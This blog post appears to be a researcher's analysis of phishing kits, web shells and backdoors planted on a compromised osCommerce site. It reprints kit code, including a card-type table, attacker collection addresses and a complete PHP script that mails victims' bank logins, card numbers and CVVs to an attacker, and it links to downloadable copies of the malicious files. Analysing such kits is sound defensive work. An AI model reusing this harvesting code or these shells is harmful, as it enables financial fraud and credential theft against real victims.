Sunday, April 17, 2011

hacked pages and spam

Another day goes by another guy reports a hacked website. This time with new spam scripts. The vulnerable web site was running an old version of osCommerce and the attackers were quite a few in the last days. What was added to the site mainly was phising templates for AoL, BofA, and others. Interestingly there is a website referred to most of the scripts, the site is http://maroc-spam.net with really bad work on the web template there guys if you are making phising sites and you promote yours in there make a better work at least.

Looking at the AoL ( http://www.deventum.com/research/Aol.zip ) files we can find information about the card that they support on their phising, eg,

cards [0] = {name: "Visa",
             length: "13,16",
             prefixes: "4",
             checkdigit: true};
cards [1] = {name: "MasterCard",
             length: "16",
             prefixes: "51,52,53,54,55",
             checkdigit: true};
cards [2] = {name: "DinersClub",
             length: "14,16",
             prefixes: "300,301,302,303,304,305,36,38,55",
             checkdigit: true};
cards [3] = {name: "CarteBlanche",
             length: "14",
             prefixes: "300,301,302,303,304,305,36,38",
             checkdigit: true};
cards [4] = {name: "AmEx",
             length: "15",
             prefixes: "34,37",
             checkdigit: true};
cards [5] = {name: "Discover",
             length: "16",
             prefixes: "6011,650",
             checkdigit: true};
cards [6] = {name: "JCB",
             length: "15,16",
             prefixes: "3,1800,2131",
             checkdigit: true};
cards [7] = {name: "enRoute",
             length: "15",
             prefixes: "2014,2149",
             checkdigit: true};
cards [8] = {name: "Solo",
             length: "16,18,19",
             prefixes: "6334, 6767",
             checkdigit: true};
cards [9] = {name: "Switch",
             length: "16,18,19",
             prefixes: "4903,4905,4911,4936,564182,633110,6333,6759",
             checkdigit: true};
cards [10] = {name: "Maestro",
             length: "16,18",
             prefixes: "5020,6",
             checkdigit: true};
cards [11] = {name: "VisaElectron",
             length: "16",
             prefixes: "417500,4917,4913",
             checkdigit: true};

Only one file is encoded using base64 encoding and the decoded output contains, the mail where the information are sent, this is defined as : $mail ="golobaz@voila.fr";

Another directory with the name www.poste.it has phising information about poste.it website. Again there is only one encoded file containing information about the recipient of the details gathered,

$usip = $_SERVER['REMOTE_ADDR'];
$mail = "golobaz@voila.fr";
$subj = "Posteitaliane Utente ";

An interesting script that seems to be specifically created for osCommerce applications since it’s gathering data from configuration files and database is Thumbs.db.php, ( http://www.deventum.com/research/Thumbs.db.php.gz )

More scripts, slq.php file, ( http://www.deventum.com/research/slq.php.gz ) is an interface for mysql or as it’s described “MySQL Interface (Developed By Mohajer22)” with embedded username and password set to :

$PASSWORD = "root_xhahax";
$USERNAME = "xhahax";

Another php web shell “ Web Shell by oRb” under the name of account_manage.php that it is a modified version of c99 shell scripts with a slightly better interface.

The usual scripts for mass mailing, this time “ Made By Mo$`Craci|a` “ , one more backdoor on the site with the name cookie_usage.php that enables an attacker to post a crafted request and login as administrator on the system.

The Bofa, “Bank of America” phising template is sending the information gathered to the following address,

$send="latesayee800@blumail.org";
$subject = "Fresh BOFA Rezult | $user | $ip";
$headers = "From: alsa7r >";

Also inside style.css we have

<?
$IP = 'm4rk0l30p4rd@yahoo.com,m4rk0l30p4rd@hotmail.com';
?>

And finally a phising template for www.caisse-epargne.fr which under confirm_fichiers/ScriptResource_013.axd again on base64 encoding contains the following:

$message  = "-----------------------------------------\n";
$message .= "--------------+ Login Info +-------------\n";
$message .= "-----------------------------------------\n";
$message .= "Nom complet : ".$_POST['ctl09$CC_sous_ouv_direct_ecureuil$ccSousCivilite$CC_sous_civilite_bloc$wzdCivilite$tbPrenom']." ".$_POST['ctl09$CC_sous_ouv_direct_ecureuil$ccSousCivilite$CC_sous_civilite_bloc$wzdCivilite$tbNom']."\n";
$message .= "Identifiant Client : ".$_POST['ctl09$CC_sous_ouv_direct_ecureuil$ccSousCivilite$CC_sous_civilite_bloc$wzdCivilite$tbInternaute']."\n";
$message .= "Date de naiscance : ".$_POST['ctl09$CC_sous_ouv_direct_ecureuil$ccSousCivilite$CC_sous_civilite_bloc$wzdCivilite$tbDateNaissance']."\n"; include 'confirm_fichiers/ScriptResource_012.axd';
$message .= "Email : ".$_POST['ctl09$CC_sous_ouv_direct_ecureuil$ccSousCivilite$CC_sous_civilite_bloc$wzdCivilite$tbEmail']."\n";
$message .= "-----------------------------------------\n";
$message .= "Adresse : ".$_POST['ctl09$CC_sous_ouv_direct_ecureuil$ccSousCoordonneesPostales$CC_sous_coordonnees_postales_bloc$wzdCoordonneesPostales$tbAdresse']."\n";
$message .= "ville : ".$_POST['ctl09$CC_sous_ouv_direct_ecureuil$ccSousCoordonneesPostales$CC_sous_coordonnees_postales_bloc$wzdCoordonneesPostales$tbVille']."\n";
$message .= "code postal : ".$_POST['ctl09$CC_sous_ouv_direct_ecureuil$ccSousCoordonneesPostales$CC_sous_coordonnees_postales_bloc$wzdCoordonneesPostales$tbCP']."\n";
$message .= "-----------------------------------------\n";
$message .= "CC number : ".$_POST['ctl09$CC_sous_ouv_direct_ecureuil$ccSousCallBack$CC_sous_call_back_bloc$wzdCallBack$tbTelephoneBureau']."\n";
$message .= "exp date : ".$_POST['ctl09$CC_sous_ouv_direct_ecureuil$ccSousCallBack$CC_sous_call_back_bloc$wzdCallBack$tbTelephoneMobile']."\n";
$message .= "cvv : ".$_POST['ctl09$CC_sous_ouv_direct_ecureuil$ccSousCallBack$CC_sous_call_back_bloc$wzdCallBack$tbTelephone']."\n";
$message .= "-----------------------------------------\n";
$message .= "--------------+ Made By REDHATTeam +------------\n";
$message .= "--------------+ Thnx My Redhatteam +------------\n";
$message .= "-----------------------------------------\n";

$send="golobaz@voila.fr";

$subject = "Bravo | $login";

$headers = "From: REdhatteam - maroc-spam.net";

mail($send,$subject,$message,$headers);

header("Location: https://www.caisse-epargne.fr/pauth.aspx?");

No comments:

Post a Comment